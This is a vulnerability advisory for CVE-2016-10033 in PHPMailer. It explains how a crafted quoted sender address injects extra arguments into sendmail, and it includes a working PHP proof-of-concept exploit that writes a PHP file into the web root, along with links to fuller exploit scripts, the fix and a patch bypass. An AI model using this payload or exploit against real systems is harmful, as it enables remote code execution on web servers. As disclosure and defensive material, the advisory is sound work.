__                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  

 <-- BACK TO legalhackers.com 

Follow @dawid_golunski ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10033 - Release date: 25.12.2016 - Last revision: 28.12.2016 - Revision 4.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- PHPMailer < 5.2.18 Remote Code Execution II. BACKGROUND ------------------------- "PHPMailer continues to be the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily." http://phpmailer.worxware.com/ "Probably the world's most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, [..], Joomla! and many more" https://github.com/PHPMailer/PHPMailer III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. Note: This revision (3.0) of the advisory, contains more information but is still incomplete. Remaining attack vectors/exploits will be disclosed at a later date to allow more time for patching. IV. DESCRIPTION ------------------------- PHPMailer class uses PHP mail() function as its default transport. The transport is implemented using the function: protected function mailSend($header, $body) { $toArr = array(); foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = implode(', ', $toArr); $params = null; //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver if (!empty($this->Sender)) { $params = sprintf('-f%s', $this->Sender); } if ($this->Sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->Sender); } $result = false; if ($this->SingleTo and count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); which essentially passes the arguments shown in the line: $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); to the mail() function with the same set of parameters. The parameters include the 5th parameter of $params which allows to pass extra parameters to sendmail binary installed on the system as per PHP documentation of mail() function: http://php.net/manual/en/function.mail.php As can we see from: $params = sprintf('-f%s', $this->Sender); PHPMailer uses the Sender variable to build the params string. The Sender string is normally set with the use of setFrom() method. which validates the Sender's address: public function setFrom($address, $name = '', $auto = true) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim // Don't validate now addresses with IDN. Will be done in send(). if (($pos = strrpos($address, '@')) === false or (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and !$this->validateAddress($address)) { ... The validation would for example reject an address as: attacker -InjectedParam2 @attacker.com which would prevent injection of additional parameters to Sendmail via the mail() function. Further research however shown that the validation is done using the RFC 3696 specification. The RFC allows emails to contain spaces when quoted with ". According to the spec, the following email address is valid: " some test email address with spaces"@weird-email.com The following Sender address: "Attacker -Param2 -Param3"@test.com would cause PHPMailer/mail() function to execute /usr/bin/sendmail with the following list of arguments: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker -Param2 -Param3@test.com] which would not work for the attacker (Param2 and Param3 are passed within the same argument of argv[3] ) Attackers can however break out of parameter no.3 with some extra escaping. For example, by injecting an extra sequence of \" after the first argument, the following Sender email: "Attacker \" -Param2 -Param3"@test.com when passed to PHPMailer (and eventually to mail()) function would cause sendmail to execute with: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Which as can be seen would inject additional parameters of 4 & 5 to sendmail. Attackers can exploit this to achieve code execution as shown in the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- <?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) Discovered/Coded by: Dawid Golunski (@dawid_golunski) https://legalhackers.com Full Advisory URL: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. The resulting file will contain the payload passed in the body of the msg: 09607 <<< --b1_cb4566aa51be9f090d9419163e492306 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< 09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- See the full advisory URL for details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'; $msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once('class.phpmailer.php'); $mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, 'Client Name'); $address = "customer_feedback@company-X.com"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!\n"; } ?> ~~~~~~~~~~~ More advanced exploit targetting a contact form can be found at: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities. Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- All versions of PHPMailer before the critical release of 5.2.18 are affected. Note that exploitation is not limited to systems with Sendmail MTA. VIII. SOLUTION ------------------------- UPDATE: The author of this advisory published a bypass of the current solution/fix which makes the PHPMailer vulnerable again in versions <5.2.20 Details: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html ~~~~~ The vulnerability was responsibly disclosed to PHPMailer vendor. The vendor released a critical security release of PHPMailer 5.2.18 to fix the issue as notified at: https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md CVE MITRE assigned the following ID to this vulnerability: CVE-2016-10033 Users should urgently update to the patched release. IX. REFERENCES ------------------------- https://legalhackers.com Bypass of the CVE-2016-10033 fix which was assigned CVE-2016-10045 id: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html This (CVE-2016-10033) advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html Video PoC exploit: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html https://www.youtube.com/watch?v=xyYMYvT2bx8 Exploit code: Simple PoC shown above is available here: https://legalhackers.com/exploits/CVE-2016-10033/PHPMailer-RCE-exploit-poc.txt Combined exploit code for multiple targets: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. The previously undisclosed techniques and exploitation vectors will be described in a security white-paper at: https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html CVE-2016-10033 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033 PHPMailer / Vendor security updates / notices: https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md https://github.com/PHPMailer/PHPMailer https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md After the release of the first advisory, the vulnerability was dubbed with a name "PwnScriptum" on a dedicted website that summerizes available information at: http://PwnScriptum.com X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com XI. REVISION HISTORY ------------------------- 28.12.2016 - Rev 4.0: Removed 'Yii' from the introduction quote that was taken from PHPMailer github. Yii is bundled with SwiftMailer, not with PHPMailer. See CVE-2016-10074 for SwiftMailer vulnerability. 27.12.2016 - Rev 3.0: Updated the advisory with a link to the advisory about CVE-2016-10045 27.12.2016 - Rev 2.0: Disclosure of additional information + Simple PoC 25.12.2016 - Limited advisory released to prompt an urgent update by affected users before disclosing the details. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Follow @dawid_golunski <-- BACK TO legalhackers.com